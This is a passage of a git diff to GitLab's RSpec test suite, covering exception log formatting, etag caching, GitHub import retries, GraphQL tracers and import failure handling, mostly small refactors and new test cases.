'sql')).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') - end - end end context 'event processors' do diff --git a/spec/lib/gitlab/etag_caching/store_spec.rb b/spec/lib/gitlab/etag_caching/store_spec.rb index 46195e64715..6188a3fc8b3 100644 --- a/spec/lib/gitlab/etag_caching/store_spec.rb +++ b/spec/lib/gitlab/etag_caching/store_spec.rb @@ -80,5 +80,19 @@ RSpec.describe Gitlab::EtagCaching::Store, :clean_gitlab_redis_shared_state do expect(store.get(key)).to eq(etag) end end + + context 'with multiple keys' do + let(:keys) { ['/my-group/my-project/builds/234.json', '/api/graphql:pipelines/id/5'] } + + it 'stores and returns multiple values' do + etags = store.touch(*keys) + + expect(etags.size).to eq(keys.size) + + keys.each_with_index do |key, i| + expect(store.get(key)).to eq(etags[i]) + end + end + end end end diff --git a/spec/lib/gitlab/exception_log_formatter_spec.rb b/spec/lib/gitlab/exception_log_formatter_spec.rb new file mode 100644 index 00000000000..beeeeb2b64c --- /dev/null +++ b/spec/lib/gitlab/exception_log_formatter_spec.rb @@ -0,0 +1,57 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::ExceptionLogFormatter do + describe '.format!' do + let(:exception) { RuntimeError.new('bad request') } + let(:backtrace) { caller } + + let(:payload) { {} } + + before do + allow(exception).to receive(:backtrace).and_return(backtrace) + end + + it 'adds exception data to log' do + described_class.format!(exception, payload) + + expect(payload['exception.class']).to eq('RuntimeError') + expect(payload['exception.message']).to eq('bad request') + expect(payload['exception.backtrace']).to eq(Gitlab::BacktraceCleaner.clean_backtrace(backtrace)) + expect(payload['exception.sql']).to be_nil + end + + context 'when exception is ActiveRecord::StatementInvalid' do + let(:exception) { ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1') } + + it 'adds the normalized SQL query to payload' do + described_class.format!(exception, payload) + + expect(payload['exception.sql']).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') + end + end + + context 'when the ActiveRecord::StatementInvalid is wrapped in another exception' do + before do + allow(exception).to receive(:cause).and_return(ActiveRecord::StatementInvalid.new(sql: 'SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."foo" = $1')) + end + + it 'adds the normalized SQL query to payload' do + described_class.format!(exception, payload) + + expect(payload['exception.sql']).to eq('SELECT "users".* FROM "users" WHERE "users"."id" = $2 AND "users"."foo" = $1') + end + end + + context 'when the ActiveRecord::StatementInvalid is a bad query' do + let(:exception) { ActiveRecord::StatementInvalid.new(sql: 'SELECT SELECT FROM SELECT') } + + it 'adds the query as-is to payload' do + described_class.format!(exception, payload) + + expect(payload['exception.sql']).to eq('SELECT SELECT FROM SELECT') + end + end + end +end diff --git a/spec/lib/gitlab/experimentation/controller_concern_spec.rb b/spec/lib/gitlab/experimentation/controller_concern_spec.rb index 1f7b7b90467..8a96771eeb8 100644 --- a/spec/lib/gitlab/experimentation/controller_concern_spec.rb +++ b/spec/lib/gitlab/experimentation/controller_concern_spec.rb @@ -97,7 +97,7 @@ RSpec.describe Gitlab::Experimentation::ControllerConcern, type: :controller do describe '#push_frontend_experiment' do it 'pushes an experiment to the frontend' do - gon = instance_double('gon') + gon = class_double('Gon') stub_experiment_for_subject(my_experiment: true) allow(controller).to receive(:gon).and_return(gon) diff --git a/spec/lib/gitlab/experimentation/experiment_spec.rb b/spec/lib/gitlab/experimentation/experiment_spec.rb index d52ab3a8983..d9bf85460b3 100644 --- a/spec/lib/gitlab/experimentation/experiment_spec.rb +++ b/spec/lib/gitlab/experimentation/experiment_spec.rb @@ -16,6 +16,7 @@ RSpec.describe Gitlab::Experimentation::Experiment do before do skip_feature_flags_yaml_validation skip_default_enabled_yaml_check + allow(Feature).to receive(:log_feature_flag_states?).and_return(false) feature = double('FeatureFlag', percentage_of_time_value: percentage, enabled?: true) allow(Feature).to receive(:get).with(:experiment_key_experiment_percentage).and_return(feature) end diff --git a/spec/lib/gitlab/git/diff_stats_collection_spec.rb b/spec/lib/gitlab/git/diff_stats_collection_spec.rb index f2fe03829be..0876a88a2ee 100644 --- a/spec/lib/gitlab/git/diff_stats_collection_spec.rb +++ b/spec/lib/gitlab/git/diff_stats_collection_spec.rb @@ -36,7 +36,7 @@ RSpec.describe Gitlab::Git::DiffStatsCollection do end it 'returns capped number when it is bigger than max_files' do - allow(::Commit).to receive(:max_diff_options).and_return(max_files: 1) + allow(::Commit).to receive(:diff_max_files).and_return(1) expect(collection.real_size).to eq('1+') end diff --git a/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb b/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb index 16cea1dc1a3..b2603e099e6 100644 --- a/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb +++ b/spec/lib/gitlab/git/rugged_impl/use_rugged_spec.rb @@ -110,7 +110,7 @@ RSpec.describe Gitlab::Git::RuggedImpl::UseRugged, :seed_helper do describe '#running_puma_with_multiple_threads?' do context 'when using Puma' do before do - stub_const('::Puma', class_double('Puma')) + stub_const('::Puma', double('puma constant')) allow(Gitlab::Runtime).to receive(:puma?).and_return(true) end diff --git a/spec/lib/gitlab/git/tree_spec.rb b/spec/lib/gitlab/git/tree_spec.rb index 005f8ecaa3a..97ba177da71 100644 --- a/spec/lib/gitlab/git/tree_spec.rb +++ b/spec/lib/gitlab/git/tree_spec.rb @@ -43,7 +43,7 @@ RSpec.describe Gitlab::Git::Tree, :seed_helper do end describe '#dir?' do - let(:dir) { entries.select(&:dir?).first } + let(:dir) { entries.find(&:dir?) } it { expect(dir).to be_kind_of Gitlab::Git::Tree } it { expect(dir.id).to eq('3c122d2b7830eca25235131070602575cf8b41a1') } @@ -134,7 +134,7 @@ RSpec.describe Gitlab::Git::Tree, :seed_helper do end describe '#file?' do - let(:file) { entries.select(&:file?).first } + let(:file) { entries.find(&:file?) } it { expect(file).to be_kind_of Gitlab::Git::Tree } it { expect(file.id).to eq('dfaa3f97ca337e20154a98ac9d0be76ddd1fcc82') } @@ -143,21 +143,21 @@ RSpec.describe Gitlab::Git::Tree, :seed_helper do end describe '#readme?' do - let(:file) { entries.select(&:readme?).first } + let(:file) { entries.find(&:readme?) } it { expect(file).to be_kind_of Gitlab::Git::Tree } it { expect(file.name).to eq('README.md') } end describe '#contributing?' do - let(:file) { entries.select(&:contributing?).first } + let(:file) { entries.find(&:contributing?) } it { expect(file).to be_kind_of Gitlab::Git::Tree } it { expect(file.name).to eq('CONTRIBUTING.md') } end describe '#submodule?' do - let(:submodule) { entries.select(&:submodule?).first } + let(:submodule) { entries.find(&:submodule?) } it { expect(submodule).to be_kind_of Gitlab::Git::Tree } it { expect(submodule.id).to eq('79bceae69cb5750d6567b223597999bfa91cb3b9') } diff --git a/spec/lib/gitlab/gitaly_client/commit_service_spec.rb b/spec/lib/gitlab/gitaly_client/commit_service_spec.rb index d8e397dd6f3..8d9ab5db886 100644 --- a/spec/lib/gitlab/gitaly_client/commit_service_spec.rb +++ b/spec/lib/gitlab/gitaly_client/commit_service_spec.rb @@ -13,10 +13,6 @@ RSpec.describe Gitlab::GitalyClient::CommitService do let(:client) { described_class.new(repository) } describe '#diff_from_parent' do - before do - stub_feature_flags(increased_diff_limits: false) - end - context 'when a commit has a parent' do it 'sends an RPC request with the parent ID as left commit' do request = Gitaly::CommitDiffRequest.new( @@ -108,45 +104,6 @@ RSpec.describe Gitlab::GitalyClient::CommitService do end end - describe '#between' do - let(:from) { 'master' } - let(:to) { Gitlab::Git::EMPTY_TREE_ID } - - context 'with between_commits_via_list_commits enabled' do - before do - stub_feature_flags(between_commits_via_list_commits: true) - end - - it 'sends an RPC request' do - request = Gitaly::ListCommitsRequest.new( - repository: repository_message, revisions: ["^" + from, to], reverse: true - ) - - expect_any_instance_of(Gitaly::CommitService::Stub).to receive(:list_commits) - .with(request, kind_of(Hash)).and_return([]) - - described_class.new(repository).between(from, to) - end - end - - context 'with between_commits_via_list_commits disabled' do - before do - stub_feature_flags(between_commits_via_list_commits: false) - end - - it 'sends an RPC request' do - request = Gitaly::CommitsBetweenRequest.new( - repository: repository_message, from: from, to: to - ) - - expect_any_instance_of(Gitaly::CommitService::Stub).to receive(:commits_between) - .with(request, kind_of(Hash)).and_return([]) - - described_class.new(repository).between(from, to) - end - end - end - describe '#diff_stats' do let(:left_commit_id) { 'master' } let(:right_commit_id) { 'cfe32cf61b73a0d5e9f13e774abde7ff789b1660' } diff --git a/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb b/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb index 0eecdfcb630..d0787d8b673 100644 --- a/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb +++ b/spec/lib/gitlab/gitaly_client/conflict_files_stitcher_spec.rb @@ -43,10 +43,10 @@ RSpec.describe Gitlab::GitalyClient::ConflictFilesStitcher do messages = [ double(files: [double(header: header_1), double(header: nil, content: content_1[0..5])]), - double(files: [double(header: nil, content: content_1[6..-1])]), + double(files: [double(header: nil, content: content_1[6..])]), double(files: [double(header: header_2)]), double(files: [double(header: nil, content: content_2[0..5]), double(header: nil, content: content_2[6..10])]), - double(files: [double(header: nil, content: content_2[11..-1])]) + double(files: [double(header: nil, content: content_2[11..])]) ] conflict_files = described_class.new(messages, target_repository.gitaly_repository).to_a diff --git a/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb b/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb index 113c47b4f2c..54c84ddc56f 100644 --- a/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb +++ b/spec/lib/gitlab/gitaly_client/diff_stitcher_spec.rb @@ -41,7 +41,7 @@ RSpec.describe Gitlab::GitalyClient::DiffStitcher do msg_2.raw_patch_data = diff_2.patch[0..100] msg_2.end_of_patch = false - msg_3 = OpenStruct.new(raw_patch_data: diff_2.patch[101..-1], end_of_patch: true) + msg_3 = OpenStruct.new(raw_patch_data: diff_2.patch[101..], end_of_patch: true) msg_4 = OpenStruct.new(diff_3.to_h.except(:patch)) msg_4.raw_patch_data = diff_3.patch diff --git a/spec/lib/gitlab/github_import/client_spec.rb b/spec/lib/gitlab/github_import/client_spec.rb index 194dfb228ee..c4d05e92633 100644 --- a/spec/lib/gitlab/github_import/client_spec.rb +++ b/spec/lib/gitlab/github_import/client_spec.rb @@ -221,6 +221,50 @@ RSpec.describe Gitlab::GithubImport::Client do expect(client.with_rate_limit { 10 }).to eq(10) end + + context 'when Faraday error received from octokit', :aggregate_failures do + let(:error_class) { described_class::CLIENT_CONNECTION_ERROR } + let(:info_params) { { 'error.class': error_class } } + let(:block_to_rate_limit) { -> { client.pull_request('foo/bar', 999) } } + + context 'when rate_limiting_enabled is true' do + it 'retries on error and succeeds' do + allow_retry + + expect(client).to receive(:requests_remaining?).twice.and_return(true) + expect(Gitlab::Import::Logger).to receive(:info).with(hash_including(info_params)).once + + expect(client.with_rate_limit(&block_to_rate_limit)).to be(true) + end + + it 'retries and does not succeed' do + allow(client).to receive(:requests_remaining?).and_return(true) + allow(client.octokit).to receive(:pull_request).and_raise(error_class, 'execution expired') + + expect { client.with_rate_limit(&block_to_rate_limit) }.to raise_error(error_class, 'execution expired') + end + end + + context 'when rate_limiting_enabled is false' do + before do + allow(client).to receive(:rate_limiting_enabled?).and_return(false) + end + + it 'retries on error and succeeds' do + allow_retry + + expect(Gitlab::Import::Logger).to receive(:info).with(hash_including(info_params)).once + + expect(client.with_rate_limit(&block_to_rate_limit)).to be(true) + end + + it 'retries and does not succeed' do + allow(client.octokit).to receive(:pull_request).and_raise(error_class, 'execution expired') + + expect { client.with_rate_limit(&block_to_rate_limit) }.to raise_error(error_class, 'execution expired') + end + end + end end describe '#requests_remaining?' do @@ -505,6 +549,25 @@ RSpec.describe Gitlab::GithubImport::Client do client.search_repos_by_name('test') end + + context 'when Faraday error received from octokit', :aggregate_failures do + let(:error_class) { described_class::CLIENT_CONNECTION_ERROR } + let(:info_params) { { 'error.class': error_class } } + + it 'retries on error and succeeds' do + allow_retry(:search_repositories) + + expect(Gitlab::Import::Logger).to receive(:info).with(hash_including(info_params)).once + + expect(client.search_repos_by_name('test')).to be(true) + end + + it 'retries and does not succeed' do + allow(client.octokit).to receive(:search_repositories).and_raise(error_class, 'execution expired') + + expect { client.search_repos_by_name('test') }.to raise_error(error_class, 'execution expired') + end + end end describe '#search_query' do @@ -531,4 +594,12 @@ RSpec.describe Gitlab::GithubImport::Client do end end end + + def allow_retry(method = :pull_request) + call_count = 0 + allow(client.octokit).to receive(method) do + call_count += 1 + call_count > 1 ? true : raise(described_class::CLIENT_CONNECTION_ERROR, 'execution expired') + end + end end diff --git a/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb b/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb index 0448ada6bca..a0e78186caa 100644 --- a/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb +++ b/spec/lib/gitlab/github_import/importer/diff_note_importer_spec.rb @@ -173,9 +173,11 @@ RSpec.describe Gitlab::GithubImport::Importer::DiffNoteImporter, :aggregate_fail EOB end - it 'imports the note as diff note' do + before do stub_user_finder(user.id, true) + end + it 'imports the note as diff note' do expect { subject.execute } .to change(DiffNote, :count) .by(1) @@ -212,6 +214,29 @@ RSpec.describe Gitlab::GithubImport::Importer::DiffNoteImporter, :aggregate_fail ``` NOTE end + + context 'when the note diff file creation fails' do + it 'falls back to the LegacyDiffNote' do + exception = ::DiffNote::NoteDiffFileCreationError.new('Failed to create diff note file') + + expect_next_instance_of(::Import::Github::Notes::CreateService) do |service| + expect(service) + .to receive(:execute) + .and_raise(exception) + end + + expect(Gitlab::GithubImport::Logger) + .to receive(:warn) + .with( + message: 'Failed to create diff note file', + 'error.class': 'DiffNote::NoteDiffFileCreationError' + ) + + expect { subject.execute } + .to change(LegacyDiffNote, :count) + .and not_change(DiffNote, :count) + end + end end end end diff --git a/spec/lib/gitlab/github_import/importer/note_importer_spec.rb b/spec/lib/gitlab/github_import/importer/note_importer_spec.rb index 96d8acbd3de..165f543525d 100644 --- a/spec/lib/gitlab/github_import/importer/note_importer_spec.rb +++ b/spec/lib/gitlab/github_import/importer/note_importer_spec.rb @@ -52,6 +52,7 @@ RSpec.describe Gitlab::GithubImport::Importer::NoteImporter do project_id: project.id, author_id: user.id, note: 'This is my note', + discussion_id: match(/\A[0-9a-f]{40}\z/), system: false, created_at: created_at, updated_at: updated_at @@ -82,6 +83,7 @@ RSpec.describe Gitlab::GithubImport::Importer::NoteImporter do project_id: project.id, author_id: project.creator_id, note: "*Created by: alice*\n\nThis is my note", + discussion_id: match(/\A[0-9a-f]{40}\z/), system: false, created_at: created_at, updated_at: updated_at diff --git a/spec/lib/gitlab/github_import/parallel_importer_spec.rb b/spec/lib/gitlab/github_import/parallel_importer_spec.rb index c7b300ff043..d418e87284d 100644 --- a/spec/lib/gitlab/github_import/parallel_importer_spec.rb +++ b/spec/lib/gitlab/github_import/parallel_importer_spec.rb @@ -27,8 +27,13 @@ RSpec.describe Gitlab::GithubImport::ParallelImporter do before do create(:import_state, :started, project: project) + worker = double(:worker) expect(Gitlab::GithubImport::Stage::ImportRepositoryWorker) + .to receive(:with_status) + .and_return(worker) + + expect(worker) .to receive(:perform_async) .with(project.id) .and_return('123') diff --git a/spec/lib/gitlab/gon_helper_spec.rb b/spec/lib/gitlab/gon_helper_spec.rb index 3d3f381b6d2..b8ed4cf608d 100644 --- a/spec/lib/gitlab/gon_helper_spec.rb +++ b/spec/lib/gitlab/gon_helper_spec.rb @@ -15,7 +15,7 @@ RSpec.describe Gitlab::GonHelper do end it 'pushes a feature flag to the frontend' do - gon = instance_double('gon') + gon = class_double('Gon') thing = stub_feature_flag_gate('thing') stub_feature_flags(my_feature_flag: thing) diff --git a/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb b/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb index 771f6e1ec46..5d444775e53 100644 --- a/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb +++ b/spec/lib/gitlab/gpg/invalid_gpg_signature_updater_spec.rb @@ -192,7 +192,7 @@ RSpec.describe Gitlab::Gpg::InvalidGpgSignatureUpdater do project: project, commit_sha: commit_sha, gpg_key: nil, - gpg_key_primary_keyid: GpgHelpers::User3.subkey_fingerprints.last[24..-1], + gpg_key_primary_keyid: GpgHelpers::User3.subkey_fingerprints.last[24..], verification_status: 'unknown_key' end diff --git a/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb b/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb index 3ce09740ec8..968d938a911 100644 --- a/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb +++ b/spec/lib/gitlab/grape_logging/loggers/exception_logger_spec.rb @@ -3,7 +3,7 @@ require 'spec_helper' RSpec.describe Gitlab::GrapeLogging::Loggers::ExceptionLogger do - let(:mock_request) { OpenStruct.new(env: {}) } + let(:mock_request) { double('env', env: {}) } let(:response_body) { nil } describe ".parameters" do @@ -76,7 +76,7 @@ RSpec.describe Gitlab::GrapeLogging::Loggers::ExceptionLogger do describe 'when an exception is available' do let(:exception) { RuntimeError.new('This is a test') } let(:mock_request) do - OpenStruct.new( + double('env', env: { ::API::Helpers::API_EXCEPTION_ENV => exception } diff --git a/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb b/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb index 0047d24a215..0741088c915 100644 --- a/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb +++ b/spec/lib/gitlab/graphql/pagination/keyset/connection_generic_keyset_spec.rb @@ -9,7 +9,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { {} } let(:query_type) { GraphQL::ObjectType.new } let(:schema) { GraphQL::Schema.define(query: query_type, mutation: nil)} - let(:context) { GraphQL::Query::Context.new(query: OpenStruct.new(schema: schema), values: nil, object: nil) } + let(:context) { GraphQL::Query::Context.new(query: double('query', schema: schema), values: nil, object: nil) } let_it_be(:column_order_id) { Gitlab::Pagination::Keyset::ColumnOrderDefinition.new(attribute_name: 'id', order_expression: Project.arel_table[:id].asc) } let_it_be(:column_order_id_desc) { Gitlab::Pagination::Keyset::ColumnOrderDefinition.new(attribute_name: 'id', order_expression: Project.arel_table[:id].desc) } @@ -98,7 +98,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:nodes) { Project.all.order(Gitlab::Pagination::Keyset::Order.build([column_order_id_desc])) } it 'returns the correct nodes' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end end end @@ -107,7 +107,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { { after: encoded_cursor(projects[1]) } } it 'only returns the project before the selected one' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end context 'when the sort order is descending' do diff --git a/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb b/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb index 8ef5f1147c5..b511a294f97 100644 --- a/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb +++ b/spec/lib/gitlab/graphql/pagination/keyset/connection_spec.rb @@ -7,7 +7,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { {} } let(:query_type) { GraphQL::ObjectType.new } let(:schema) { GraphQL::Schema.define(query: query_type, mutation: nil)} - let(:context) { GraphQL::Query::Context.new(query: OpenStruct.new(schema: schema), values: nil, object: nil) } + let(:context) { GraphQL::Query::Context.new(query: double('query', schema: schema), values: nil, object: nil) } subject(:connection) do described_class.new(nodes, **{ context: context, max_page_size: 3 }.merge(arguments)) @@ -120,7 +120,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:nodes) { Project.all.order(id: :desc) } it 'returns the correct nodes' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end end end @@ -129,7 +129,7 @@ RSpec.describe Gitlab::Graphql::Pagination::Keyset::Connection do let(:arguments) { { after: encoded_cursor(projects[1]) } } it 'only returns the project before the selected one' do - expect(subject.sliced_nodes).to contain_exactly(*projects[2..-1]) + expect(subject.sliced_nodes).to contain_exactly(*projects[2..]) end context 'when the sort order is descending' do diff --git a/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb b/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb index d83ac4dabc5..5bc077a963e 100644 --- a/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb +++ b/spec/lib/gitlab/graphql/tracers/logger_tracer_spec.rb @@ -1,6 +1,5 @@ # frozen_string_literal: true -require "fast_spec_helper" -require "support/graphql/fake_query_type" +require "spec_helper" RSpec.describe Gitlab::Graphql::Tracers::LoggerTracer do let(:dummy_schema) do @@ -49,4 +48,15 @@ RSpec.describe Gitlab::Graphql::Tracers::LoggerTracer do dummy_schema.execute(query_string, variables: variables) end + + it 'logs exceptions for breaking queries' do + query_string = "query fooOperation { breakingField }" + + expect(::Gitlab::GraphqlLogger).to receive(:info).with(a_hash_including({ + 'exception.message' => 'This field is supposed to break', + 'exception.class' => 'RuntimeError' + })) + + expect { dummy_schema.execute(query_string) }.to raise_error(/This field is supposed to break/) + end end diff --git a/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb b/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb index ff6a76aa319..168f5aa529e 100644 --- a/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb +++ b/spec/lib/gitlab/graphql/tracers/metrics_tracer_spec.rb @@ -1,6 +1,6 @@ # frozen_string_literal: true -require 'fast_spec_helper' +require 'spec_helper' require 'rspec-parameterized' require "support/graphql/fake_query_type" @@ -36,7 +36,7 @@ RSpec.describe Gitlab::Graphql::Tracers::MetricsTracer do end with_them do - it 'increments sli' do + it 'increments apdex sli' do # Trigger initialization fake_schema @@ -56,5 +56,13 @@ RSpec.describe Gitlab::Graphql::Tracers::MetricsTracer do fake_schema.execute("query lorem { helloWorld }") end end + + it "does not record apdex for failing queries" do + query_string = "query fooOperation { breakingField }" + + expect(Gitlab::Metrics::RailsSlis.graphql_query_apdex).not_to receive(:increment) + + expect { fake_schema.execute(query_string) }.to raise_error(/This field is supposed to break/) + end end end diff --git a/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb b/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb index 7f837e28772..986120dcd95 100644 --- a/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb +++ b/spec/lib/gitlab/graphql/tracers/timer_tracer_spec.rb @@ -20,6 +20,7 @@ RSpec.describe Gitlab::Graphql::Tracers::TimerTracer do before do current_time = 0 + allow(tracer_spy).to receive(:trace) allow(Gitlab::Metrics::System).to receive(:monotonic_time) do current_time += expected_duration end @@ -30,6 +31,18 @@ RSpec.describe Gitlab::Graphql::Tracers::TimerTracer do dummy_schema.execute(query_string) + expect_to_have_traced(tracer_spy, expected_duration, query_string) + end + + it "adds a duration_s even if the query failed" do + query_string = "query fooOperation { breakingField }" + + expect { dummy_schema.execute(query_string) }.to raise_error(/This field is supposed to break/) + + expect_to_have_traced(tracer_spy, expected_duration, query_string) + end + + def expect_to_have_traced(tracer_spy, expected_duration, query_string) # "parse" and "execute_query" are just arbitrary trace events expect(tracer_spy).to have_received(:trace).with("parse", { duration_s: expected_duration, diff --git a/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb b/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb index 9e6ad35861f..ddd681f75f0 100644 --- a/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb +++ b/spec/lib/gitlab/hook_data/merge_request_builder_spec.rb @@ -15,6 +15,7 @@ RSpec.describe Gitlab::HookData::MergeRequestBuilder do assignee_id assignee_ids author_id + blocking_discussions_resolved created_at description head_pipeline_id diff --git a/spec/lib/gitlab/import/import_failure_service_spec.rb b/spec/lib/gitlab/import/import_failure_service_spec.rb index c16d4a7c804..e3fec63adde 100644 --- a/spec/lib/gitlab/import/import_failure_service_spec.rb +++ b/spec/lib/gitlab/import/import_failure_service_spec.rb @@ -7,58 +7,48 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do let_it_be(:project) { create(:project, :import_started, import_type: import_type) } let(:exception) { StandardError.new('some error') } - let(:arguments) { { project_id: project.id } } - let(:base_arguments) { { error_source: 'SomeImporter', exception: exception }.merge(arguments) } - let(:exe_arguments) { { fail_import: false, metrics: false } } + let(:import_state) { nil } + let(:fail_import) { false } + let(:metrics) { false } + + let(:arguments) do + { + project_id: project.id, + error_source: 'SomeImporter', + exception: exception, + fail_import: fail_import, + metrics: metrics, + import_state: import_state + } + end describe '.track' do + let(:instance) { double(:failure_service) } + context 'with all arguments provided' do - let(:instance) { double(:failure_service) } - let(:instance_arguments) do + let(:arguments) do { exception: exception, import_state: '_import_state_', project_id: '_project_id_', - error_source: '_error_source_' - } - end - - let(:exe_arguments) do - { + error_source: '_error_source_', fail_import: '_fail_import_', metrics: '_metrics_' } end it 'invokes a new instance and executes' do - expect(described_class).to receive(:new).with(**instance_arguments).and_return(instance) - expect(instance).to receive(:execute).with(**exe_arguments) + expect(described_class).to receive(:new).with(**arguments).and_return(instance) + expect(instance).to receive(:execute) - described_class.track(**instance_arguments.merge(exe_arguments)) + described_class.track(**arguments) end end context 'with only necessary arguments utilizing defaults' do - let(:instance) { double(:failure_service) } - let(:instance_arguments) do - { - exception: exception, - import_state: nil, - project_id: nil, - error_source: nil - } - end - - let(:exe_arguments) do - { - fail_import: false, - metrics: false - } - end - it 'invokes a new instance and executes' do - expect(described_class).to receive(:new).with(**instance_arguments).and_return(instance) - expect(instance).to receive(:execute).with(**exe_arguments) + expect(described_class).to receive(:new).with(a_hash_including(exception: exception)).and_return(instance) + expect(instance).to receive(:execute) described_class.track(exception: exception) end @@ -66,7 +56,7 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do end describe '#execute' do - subject(:service) { described_class.new(**base_arguments) } + subject(:service) { described_class.new(**arguments) } shared_examples 'logs the exception and fails the import' do it 'when the failure does not abort the import' do @@ -89,13 +79,14 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do source: 'SomeImporter' ) - service.execute(**exe_arguments) + service.execute expect(project.import_state.reload.status).to eq('failed') expect(project.import_failures).not_to be_empty expect(project.import_failures.last.exception_class).to eq('StandardError') expect(project.import_failures.last.exception_message).to eq('some error') + expect(project.import_failures.last.retry_count).to eq(0) end end @@ -120,32 +111,36 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do source: 'SomeImporter' ) - service.execute(**exe_arguments) + service.execute expect(project.import_state.reload.status).to eq('started') expect(project.import_failures).not_to be_empty expect(project.import_failures.last.exception_class).to eq('StandardError') expect(project.import_failures.last.exception_message).to eq('some error') + expect(project.import_failures.last.retry_count).to eq(nil) end end context 'when tracking metrics' do - let(:exe_arguments) { { fail_import: false, metrics: true } } + let(:metrics) { true } it 'tracks the failed import' do - metrics = double(:metrics) + metrics_double = double(:metrics) - expect(Gitlab::Import::Metrics).to receive(:new).with("#{project.import_type}_importer", project).and_return(metrics) - expect(metrics).to receive(:track_failed_import) + expect(Gitlab::Import::Metrics) + .to receive(:new) + .with("#{project.import_type}_importer", project) + .and_return(metrics_double) + expect(metrics_double).to receive(:track_failed_import) - service.execute(**exe_arguments) + service.execute end end context 'when using the project as reference' do context 'when it fails the import' do - let(:exe_arguments) { { fail_import: true, metrics: false } } + let(:fail_import) { true } it_behaves_like 'logs the exception and fails the import' end @@ -156,10 +151,10 @@ RSpec.describe Gitlab::Import::ImportFailureService, :aggregate_failures do end context 'when using the import_state as reference' do - let(:arguments) { { import_state: project.import_state } } + let(:import_state) { project.import_state } context 'when it fails the import' do - let(:exe_arguments) { { fail_import: true, metrics: false } } + let(:fail_import) { true } it_behaves_like 'logs the exception and fails the import' end diff --git a/spec/lib/gitlab/import/set_async_jid_spec.rb b/spec/lib/gitlab/import/set_async_jid_spec.rb index 6931a7a953d..016f7cac61a 100644 --- a/spec/lib/gitlab/import/set_async_jid_spec.rb +++ b/spec/lib/gitlab/import/set_async_jid_spec.rb @@ -8,7 +8,7 @@ RSpec.describe Gitlab::Import::SetAsyncJid do it 'sets the JID in Redis' do expect(Gitlab::SidekiqStatus) .to receive(:set) - .with("async-import/project-import-state/#{project.id}", Gitlab::Import::StuckImportJob::IMPORT_JOBS_EXPIRATION) + .with("async-import/project-import-state/#{project.id}", Gitlab::Import::StuckImportJob::IMPORT_JOBS_EXPIRATION, value: 2) .and_call_original described_class.set_jid(project.import_state) diff --git a/spec/lib/gitlab/import_export/all_models.yml b/spec/lib/gitlab/import_export/all_models.yml index b474f5825fd..7ed80cbcf66 100644 --- a/spec/lib/gitlab/import_export/all_models.yml +++ b/spec/lib/gitlab/import_export/all_models.yml @@ -61,6 +61,7 @@ issues: - pending_escalations - customer_relations_contacts - issue_customer_relations_contacts +- email work_item_type: - issues events: @@ -197,6 +198,7 @@ merge_requests: - system_note_metadata - note_authors - cleanup_schedule +- compliance_violations external_pull_requests: - project merge_request_diff: @@ -223,6 +225,7 @@ ci_pipelines: - ci_ref - stages - statuses +- statuses_order_id_desc - latest_statuses_ordered_by_stage - builds - bridges @@ -596,6 +599,8 @@ project: - security_scans - ci_feature_usages - bulk_import_exports +- ci_project_mirror +- sync_events 